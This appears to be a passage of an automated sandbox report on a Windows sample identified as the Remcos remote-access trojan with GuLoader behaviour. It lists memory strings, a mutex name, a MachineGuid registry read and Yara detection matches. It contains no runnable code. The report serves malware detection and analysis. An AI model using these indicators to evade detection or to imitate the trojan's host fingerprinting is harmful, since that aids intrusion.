Source: Dlls.exe, 00000013.00000002.142216438869.0000000000902000.00000004.00000020.sdmp Binary or memory string: Program Manager#
Source: Dlls.exe, 00000013.00000002.142216831813.0000000001020000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: Dlls.exe, 00000013.00000002.142216438869.0000000000902000.00000004.00000020.sdmp Binary or memory string: Program ManagerCJB
Source: Dlls.exe, 00000013.00000002.142216831813.0000000001020000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: Dlls.exe, 00000013.00000002.142216831813.0000000001020000.00000002.00020000.sdmp Binary or memory string: Progman
Source: Dlls.exe, 00000013.00000002.142216438869.0000000000902000.00000004.00000020.sdmp Binary or memory string: Program ManagerCJBCA\
Source: Dlls.exe, 00000013.00000002.142216309015.00000000008EB000.00000004.00000020.sdmp Binary or memory string: [ Program Manager ]
Source: Dlls.exe, 00000013.00000002.142216438869.0000000000902000.00000004.00000020.sdmp Binary or memory string: Program Managerr|
Source: Dlls.exe, 00000013.00000002.142216831813.0000000001020000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: Dlls.exe, 00000013.00000002.142216438869.0000000000902000.00000004.00000020.sdmp Binary or memory string: Program Manager2
Source: Dlls.exe, 00000013.00000002.142216216346.00000000008D9000.00000004.00000020.sdmp Binary or memory string: |Program Manager|
Source: Dlls.exe, 00000013.00000002.142216438869.0000000000902000.00000004.00000020.sdmp Binary or memory string: Program Manager~
Source: Dlls.exe, 00000013.00000002.142216438869.0000000000902000.00000004.00000020.sdmp Binary or memory string: Program Manager|

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Remcos RAT
Source: Yara match File source: 00000014.00000002.139080988334.00000000007BD000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.137983792450.00000000009E7000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.139148441525.000000000087B000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.139148381196.0000000000870000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.142216309015.00000000008EB000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: mU9H96igb3.exe PID: 6380, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Dlls.exe PID: 7852, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Dlls.exe PID: 3384, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Dlls.exe PID: 4696, type: MEMORYSTR
GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior

Remote Access Functionality:

Yara detected Remcos RAT
Source: Yara match File source: 00000014.00000002.139080988334.00000000007BD000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.137983792450.00000000009E7000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.139148441525.000000000087B000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.139148381196.0000000000870000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.142216309015.00000000008EB000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: mU9H96igb3.exe PID: 6380, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Dlls.exe PID: 7852, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Dlls.exe PID: 3384, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Dlls.exe PID: 4696, type: MEMORYSTR
Detected Remcos RAT
Source: Dlls.exe, 00000014.00000002.139080544159.0000000000758000.00000004.00000020.sdmp String found in binary or memory: Remcos_Mutex_Inj
Source: Dlls.exe, 00000015.00000002.139147980600.0000000000818000.00000004.00000020.sdmp String found in binary or memory: Remcos_Mutex_InjJ